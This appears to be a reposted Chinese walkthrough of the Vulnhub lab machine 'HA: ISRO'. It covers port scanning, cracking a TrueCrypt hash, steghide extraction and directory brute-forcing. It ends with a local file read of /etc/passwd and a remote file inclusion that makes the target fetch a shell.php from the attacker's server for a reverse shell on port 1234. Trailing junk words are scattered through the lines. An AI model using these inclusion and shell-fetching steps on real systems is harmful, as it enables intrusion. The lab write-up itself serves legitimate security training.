HA: ISRO Vulnhub Walkthrough

時間 2019-11-08

標籤 isro vulnhub walkthrough 简体版

原文原文鏈接

下載地址：php

https://www.vulnhub.com/entry/ha-isro,376/html

主機掃描：python

╰─ nmap -p- -sV -oA scan 10.10.202.131
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-21 17:09 CST
Nmap scan report for 10.10.202.131
Host is up (0.0038s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
65534/tcp open ftp vsftpd 3.0.3
MAC Address: 00:0C:29:EB:8E:64 (VMware)
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernellinux

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .git

HTTPgithub

view-source:http://10.10.202.131/bhaskara.htmlweb

看起來是base64shell

解密爲：/bhaskaraubuntu

file bhashara 是加密磁盤，進行解密操做瀏覽器

獲取加密的hash值

https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/truecrypt2john.py

python truecrypt2john.py bhaskara > hashes

╰─ john --wordlist=/usr/share/wordlists/rockyou.txt hashes

密碼：xavier

進行目錄枚舉

dirsearch http://10.10.202.131/ php

http://10.10.202.131/img/

http://10.10.202.131/img/aryabhata.jpg

圖片應該有隱寫，這裏使用一款工具：steghide

Steghide是一款開源的隱寫術軟件，它能夠讓你在一張圖片或者音頻文件中隱藏你的祕密信息，並且你不會注意到圖片或音頻文件發生了任何的改變。並且，你的祕密文件已經隱藏在了原始圖片或音頻文件之中了。這是一個命令行軟件。所以，你須要學習使用這個工具的命令。你須要經過命令來實現將祕密文件嵌入至圖片或音頻文件之中。除此以外，你還須要使用其餘的命令來提取你隱藏在圖片或音頻中的祕密文件。

steghide extract -sf aryabhata.jpg

提示密碼直接回車

繼續使用dirb 目錄掃描繼續探測

╰─ dirb http://10.10.202.131/ -X .php

+ http://10.10.202.131/connect.php (CODE:200|SIZE:0)

訪問顯示空白

嘗試fuzz 下次接口參數，最後得知file 參數，能夠命令執行

http://10.10.202.131/connect.php?file=/etc/passwd

嘗試獲取webshell

╰─ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.202.131 - - [21/Oct/2019 17:36:22] "GET /shell.php HTTP/1.0" 200 -

本機監聽：1234

瀏覽器訪問：http://10.10.202.131/connect.php?file=http://10.10.202.133:8000/shell.php